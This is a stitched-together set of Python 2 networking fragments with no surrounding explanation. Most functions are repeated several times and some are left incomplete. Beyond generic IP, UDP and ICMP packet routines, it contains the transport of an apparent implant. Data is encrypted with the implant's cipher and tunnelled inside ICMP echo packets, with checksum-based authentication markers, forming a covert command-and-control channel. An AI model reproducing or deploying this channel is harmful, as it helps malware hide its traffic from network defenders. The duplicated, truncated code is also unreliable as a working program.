def ReadInPacket(self,pkt):
self.data = ""
icmpcsum = inet.cksum(pkt)
# Initial checks
#print "Checking entire checksum"
if icmpcsum != 0:
print "Ping packet checksum is incorrect....ignoring packet"
raise ValueError, pkt
#print "Checking for 0x0809"
if struct.unpack("!H",pkt[16:18])[0] != 0x0809L:
print "Did not find 0x0809 just before the checksum"
raise ValueError, pkt
#print "Looking for no 0x0a0b"
if struct.unpack("!H",pkt[18:20])[0] == 0x0a0bL:
print "Found the invalid checksum 0x0A0B"
raise ValueError, pkt
icmp_type = pkt[0]
icmp_code = pkt[1]
icmp_ident = struct.unpack("!H",pkt[4:6])[0]
icmp_seq = struct.unpack("!H",pkt[6:8])[0]
ping_timestamp_sec = struct.unpack("!L",pkt[8:12])[0]
ping_timestamp_usec = struct.unpack("!L",pkt[12:16])[0]
chksum1 = struct.unpack("!H",pkt[18:20])[0]
#print "Checking ident"
if icmp_ident != self.pid:
print "Packet not for us. Possibly for another process?"
raise ValueError, pkt
# Checking seq
if icmp_seq != self.seq:
print "Packet received out of order"
raise ValueError, pkt
# Decrypt
pt = self.implant.cipher.Decrypt(pkt[20:])
#print "Checking pt checksum"
if inet.cksum(pt) != 0:
print "Auth[0] checksum is incorrect"
raise ValueError, pt
chksum2 = struct.unpack("!H",pt[:2])[0]
#print "Checking for matching auth[0][0] chksum"
if chksum2 != chksum1:
print "Checksum inside auth[0] doesn't match the one on the outside"
raise ValueError, pt
if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L):
print "Data received in the low order byte of auth[1]"
raise ValueError, pt
def ReadInPacket(self, pkt):
self.data = ""
icmpcsum = inet.cksum(pkt)
# Initial checks
#print "Checking entire checksum"
if icmpcsum != 0:
print "Ping packet checksum is incorrect....ignoring packet"
raise ValueError, pkt
#print "Checking for 0x0809"
if struct.unpack("!H", pkt[16:18])[0] != 0x0809L:
print "Did not find 0x0809 just before the checksum"
raise ValueError, pkt
#print "Looking for no 0x0a0b"
if struct.unpack("!H", pkt[18:20])[0] == 0x0a0bL:
print "Found the invalid checksum 0x0A0B"
raise ValueError, pkt
icmp_type = pkt[0]
icmp_code = pkt[1]
icmp_ident = struct.unpack("!H", pkt[4:6])[0]
icmp_seq = struct.unpack("!H", pkt[6:8])[0]
ping_timestamp_sec = struct.unpack("!L", pkt[8:12])[0]
ping_timestamp_usec = struct.unpack("!L", pkt[12:16])[0]
chksum1 = struct.unpack("!H", pkt[18:20])[0]
#print "Checking ident"
if icmp_ident != self.pid:
print "Packet not for us. Possibly for another process?"
raise ValueError, pkt
# Checking seq
if icmp_seq != self.seq:
print "Packet received out of order"
raise ValueError, pkt
# Decrypt
pt = self.implant.cipher.Decrypt(pkt[20:])
#print "Checking pt checksum"
if inet.cksum(pt) != 0:
print "Auth[0] checksum is incorrect"
raise ValueError, pt
chksum2 = struct.unpack("!H", pt[:2])[0]
#print "Checking for matching auth[0][0] chksum"
if chksum2 != chksum1:
print "Checksum inside auth[0] doesn't match the one on the outside"
raise ValueError, pt
if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L):
print "Data received in the low order byte of auth[1]"
raise ValueError, pt
def SendTo(self, data):
self.PreSendChecks()
# Get current time
curr_time = time.time()
curr_time_sec = int(curr_time)
curr_time_usec = int((curr_time - float(curr_time_sec)) * 1000000.)
# Construct the ICMP header
idseq = struct.pack("!HH", self.pid, self.seq)
icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq
# Construct the ECHO header and checksum
echo_header_tmp = struct.pack("!LLH", \
curr_time_sec, curr_time_usec, 0x0809)
echo_header = echo_header_tmp + '\000\000'
echo_header_cksum = inet.cksum(icmp_header + echo_header)
echo_header_cksum = (struct.unpack(
"!L", '\000\000' + struct.pack("!H", echo_header_cksum)))[0]
# Make sure the checksum is not 0x0a0b
if echo_header_cksum == 0x0a0b:
echo_header_tmp = struct.pack("!LLH", curr_time_sec,
curr_time_usec + 1, 0x0809)
echo_header_cksum = struct.unpack(
"!L", '\000\000' + struct.pack("!H", echo_header_cksum))[0]
# Add the checksum to the header
echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum)
# Auth[0] = [ cksum for echo_header ] [ cksum for data ]
data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\
'\000\000' + struct.pack("!L", 0xffffff00L) +\
data)
auth_0 = struct.pack("HH", echo_header_cksum, data_cksum)
auth_1 = struct.pack("!L", 0xffffff00L)
msg = auth_0 + auth_1 + data
# Encrypt if necessary
if self.implant.cipher:
msg = self.implant.cipher.Encrypt(msg)
# Compress if necessary
if self.compression:
msg = compression.Compress(msg)
# Reconstruct the ICMP header with the checksum
icmp_header = chr(8) + chr(0) +\
struct.pack("H", inet.cksum(icmp_header + \
echo_header +\
msg)) + idseq
# Send it out
fpos = icmp_header + echo_header + msg
self.sock.sendto(fpos, self.dest)
def SendTo(self, data):
self.PreSendChecks()
# Get current time
curr_time = time.time()
curr_time_sec = int(curr_time)
curr_time_usec = int((curr_time - float(curr_time_sec))*1000000.)
# Construct the ICMP header
idseq = struct.pack("!HH", self.pid, self.seq)
icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq
# Construct the ECHO header and checksum
echo_header_tmp = struct.pack("!LLH", \
curr_time_sec, curr_time_usec, 0x0809)
echo_header = echo_header_tmp + '\000\000'
echo_header_cksum = inet.cksum(icmp_header + echo_header)
echo_header_cksum = (struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum)))[0]
# Make sure the checksum is not 0x0a0b
if echo_header_cksum == 0x0a0b:
echo_header_tmp = struct.pack("!LLH", curr_time_sec,
curr_time_usec+1, 0x0809)
echo_header_cksum = struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum))[0]
# Add the checksum to the header
echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum)
# Auth[0] = [ cksum for echo_header ] [ cksum for data ]
data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\
'\000\000' + struct.pack("!L", 0xffffff00L) +\
data)
auth_0 = struct.pack("HH",echo_header_cksum, data_cksum)
auth_1 = struct.pack("!L",0xffffff00L)
msg = auth_0 + auth_1 + data
# Encrypt if necessary
if self.implant.cipher:
msg = self.implant.cipher.Encrypt(msg)
# Compress if necessary
if self.compression:
msg = compression.Compress(msg)
# Reconstruct the ICMP header with the checksum
icmp_header = chr(8) + chr(0) +\
struct.pack("H", inet.cksum(icmp_header + \
echo_header +\
msg)) + idseq
# Send it out
fpos = icmp_header + echo_header + msg
self.sock.sendto(fpos, self.dest)
def __disassemble(self, raw_packet, cksum=0):
# The kernel computes the checksum, even on a raw packet.
packet = inet.net2iph(raw_packet)
b1 = ord(packet[0])
self.v = (b1 >> 4) & 0x0f
self.hl = b1 & 0x0f
if self.v != IPVERSION:
raise ValueError, "cannot handle IPv%d packets" % self.v
hl = self.hl * 4
# verify the checksum
self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
if cksum:
our_cksum = inet.cksum(packet[:20])
if our_cksum != 0:
raise ValueError, packet
# unpack the fields
elts = struct.unpack('cchhhcc', packet[:hl - 10])
# struct didn't do !<> when this was written
self.tos = ord(elts[1])
self.len = elts[2] & 0xffff
self.id = elts[3] & 0xffff
self.off = elts[4] & 0xffff
self.ttl = ord(elts[5])
self.p = ord(elts[6])
self.data = packet[hl:]
self.src = packet[hl - 8:hl - 4]
self.dst = packet[hl - 4:hl]
self.__unparse_addrs()
def __disassemble(self, raw_packet, cksum=0):
# The kernel computes the checksum, even on a raw packet.
packet = inet.net2iph(raw_packet)
b1 = ord(packet[0])
self.v = (b1 >> 4) & 0x0f
self.hl = b1 & 0x0f
if self.v != IPVERSION:
raise ValueError, "cannot handle IPv%d packets" % self.v
hl = self.hl * 4
# verify the checksum
self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
if cksum:
our_cksum = inet.cksum(packet[:20])
if our_cksum != 0:
raise ValueError, packet
# unpack the fields
elts = struct.unpack('cchhhcc', packet[:hl - 10])
# struct didn't do !<> when this was written
self.tos = ord(elts[1])
self.len = elts[2] & 0xffff
self.id = elts[3] & 0xffff
self.off = elts[4] & 0xffff
self.ttl = ord(elts[5])
self.p = ord(elts[6])
self.data = packet[hl:]
self.src = packet[hl - 8:hl - 4]
self.dst = packet[hl - 4:hl]
self.__unparse_addrs()
def __disassemble(self, raw_packet, cksum=0):
# Ok, I didn't realize this. The kernel does the checksum for
# you, even on a raw packet. Plus, the Python cksum code seems
# to be buggy. It's different than the IP version by ...01010
packet = inet.net2iph(raw_packet)
b1 = ord(packet[0])
self.v = (b1 >> 4) & 0x0f
self.hl = b1 & 0x0f
if self.v != IPVERSION:
raise ValueError, "cannot handle IPv%d packets" % self.v
hl = self.hl * 4
# verify the checksum
self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
if cksum:
our_cksum = inet.cksum(packet[:20])
if our_cksum != 0:
raise ValueError, packet
# unpack the fields
elts = struct.unpack('cchhhcc', packet[:hl-10])
# struct didn't do !<> when this was written
self.tos = ord(elts[1])
self.len = elts[2] & 0xffff
self.id = elts[3] & 0xffff
self.off = elts[4] & 0xffff
self.ttl = ord(elts[5])
self.p = ord(elts[6])
self.data = packet[hl:]
self.src = packet[hl-8:hl-4]
self.dst = packet[hl-4:hl]
self.__unparse_addrs()
def assemble(self, cksum=0):
"Get a packet suitable for sending over an IP socket."
# make sure all the data is ready
self.len = self.hl * 4 + len(self.data)
self.__parse_addrs()
# create the packet
header = struct.pack('cchhhcc',
chr((self.v & 0x0f) << 4
| (self.hl & 0x0f)), # 4bits each
chr(self.tos & 0xff),
self.len,
self.id,
self.off, # what about flags?
chr(self.ttl & 0xff),
chr(self.p & 0xff))
if cksum:
self.sum = inet.cksum(header + '\000\000' + self.__src +
self.__dst)
packet = header + struct.pack('h', self.sum) \
+ self.__src + self.__dst
else:
packet = header + '\000\000' + self.__src + self.__dst
packet = packet + self.data
self.__packet = inet.iph2net(packet)
return self.__packet
def __disassemble(self, raw_packet, cksum=0):
# Ok, I didn't realize this. The kernel does the checksum for
# you, even on a raw packet. Plus, the Python cksum code seems
# to be buggy. It's different than the IP version by ...01010
packet = inet.net2iph(raw_packet)
b1 = ord(packet[0])
self.v = (b1 >> 4) & 0x0f
self.hl = b1 & 0x0f
if self.v != IPVERSION:
raise ValueError, "cannot handle IPv%d packets" % self.v
hl = self.hl * 4
# verify the checksum
self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
if cksum:
our_cksum = inet.cksum(packet[:20])
if our_cksum != 0:
raise ValueError, packet
# unpack the fields
elts = struct.unpack('cchhhcc', packet[:hl-10])
# struct didn't do !<> when this was written
self.tos = ord(elts[1])
self.len = elts[2] & 0xffff
self.id = elts[3] & 0xffff
self.off = elts[4] & 0xffff
self.ttl = ord(elts[5])
self.p = ord(elts[6])
self.data = packet[hl:]
self.src = packet[hl-8:hl-4]
self.dst = packet[hl-4:hl]
self.__unparse_addrs()
def assemble(self, cksum=0):
"Get a packet suitable for sending over an IP socket."
# make sure all the data is ready
self.len = self.hl * 4 + len(self.data)
self.__parse_addrs()
# create the packet
header = struct.pack('cchhhcc',
chr((self.v & 0x0f) << 4
| (self.hl & 0x0f)), # 4bits each
chr(self.tos & 0xff),
self.len,
self.id,
self.off, # what about flags?
chr(self.ttl & 0xff),
chr(self.p & 0xff))
if cksum:
self.sum = inet.cksum(header + '\000\000' + self.__src +
self.__dst)
packet = header + struct.pack('h', self.sum) \
+ self.__src + self.__dst
else:
packet = header + '\000\000' + self.__src + self.__dst
packet = packet + self.data
self.__packet = inet.iph2net(packet)
return self.__packet
def assemble(self, cksum=1):
idseq = struct.pack('hh', self.id, self.seq)
packet = chr(self.type) + chr(self.code) + '\000\000' + idseq + self.data
if cksum:
self.cksum = inet.cksum(packet)
packet = chr(self.type) + chr(self.code) + struct.pack('H', self.cksum) + idseq + self.data
self.__packet = packet
return self.__packet
def SendTo(self,data):
data_cksum = inet.cksum( '\000\000\000\000' + \
struct.pack("!L",0xffffff00L) + data)
auth_0 = struct.pack("HH",0,data_cksum)
auth_1 = struct.pack("!L",0xffffff00L)
msg = auth_0 + auth_1 + data
msg = self.implant.cipher.Encrypt(msg)
self.sock.send(msg)
def assemble(self, cksum=1):
self.ulen = 8 + len(self.data)
begin = struct.pack('hhh', self.sport, self.dport, self.ulen)
packet = begin + '\000\000' + self.data
if cksum:
self.sum = inet.cksum(packet)
packet = begin + struct.pack('h', self.sum) + self.data
self.__packet = inet.udph2net(packet)
return self.__packet
def __disassemble(self, raw_packet, cksum=1):
packet = inet.net2updh(raw_packet)
if cksum and packet[6:8] != '\000\000':
our_cksum = inet.cksum(packet)
if our_cksum != 0:
raise ValueError, packet
elts = map(lambda x: x & 0xffff, struct.unpack('hhhh', packet[:8]))
[self.sport, self.dport, self.ulen, self.sum] = elts
self.data = packet[8:]
def assemble(self, cksum=1):
self.ulen = 8 + len(self.data)
begin = struct.pack('hhh', self.sport, self.dport, self.ulen)
packet = begin + '\000\000' + self.data
if cksum:
self.sum = inet.cksum(packet)
packet = begin + struct.pack('h', self.sum) + self.data
self.__packet = inet.udph2net(packet)
return self.__packet
def __disassemble(self, raw_packet, cksum=1):
packet = inet.net2updh(raw_packet)
if cksum and packet[6:8] != '\000\000':
our_cksum = inet.cksum(packet)
if our_cksum != 0:
raise ValueError, packet
elts = map(lambda x:x & 0xffff, struct.unpack('hhhh', packet[:8]))
[self.sport, self.dport, self.ulen, self.sum] = elts
self.data = packet[8:]
def __disassemble(self, packet, cksum=1):
if cksum:
our_cksum = inet.cksum(packet)
if our_cksum != 0:
raise ValueError, packet
self.type = ord(packet[0])
self.code = ord(packet[1])
elts = struct.unpack('hhh', packet[2:8])
[self.cksum, self.id, self.seq] = map(lambda x:x & 0xffff, elts)
self.data = packet[8:]
def assemble(self, cksum=1):
idseq = struct.pack("hh", self.id, self.seq)
packet = chr(self.type) + chr(self.code) + "\000\000" + idseq + self.data
if cksum:
self.cksum = inet.cksum(packet)
packet = chr(self.type) + chr(self.code) + struct.pack("h", self.cksum) + idseq + self.data
# Don't need to do any byte-swapping, because idseq is
# appplication defined and others are single byte values.
self.__packet = packet
return self.__packet
def __disassemble(self, packet, cksum=1):
if cksum:
our_cksum = inet.cksum(packet)
if our_cksum != 0:
raise ValueError, packet
self.type = ord(packet[0])
self.code = ord(packet[1])
elts = struct.unpack('hhh', packet[2:8])
[self.cksum, self.id, self.seq] = map(lambda x: x & 0xffff, elts)
self.data = packet[8:]
def RecvFrom(self):
stuff = self.sock.recv(1500)
# Decrypt
pt = self.implant.cipher.Decrypt(stuff)
if inet.cksum(pt) != 0:
print "Auth[0] checksum is incorrect"
raise ValueError, pt
if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L):
print "Data received in the low order byte of auth[1]"
raise ValueError, pt
def assemble(self, cksum=1):
idseq = struct.pack('hh', self.id, self.seq)
packet = chr(self.type) + chr(self.code) + '\000\000' + idseq \
+ self.data
if cksum:
self.cksum = inet.cksum(packet)
packet = chr(self.type) + chr(self.code) \
+ struct.pack('H', self.cksum) + idseq + self.data
# Don't need to do any byte-swapping, because idseq is
# appplication defined and others are single byte values.
self.__packet = packet
return self.__packet
def RecvFrom(self):
stuff = self.sock.recv(1500)
# Decrypt
pt = self.implant.cipher.Decrypt(stuff)
if inet.cksum(pt) != 0:
print "Auth[0] checksum is incorrect"
raise ValueError, pt
if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L):
print "Data received in the low order byte of auth[1]"
raise ValueError, pt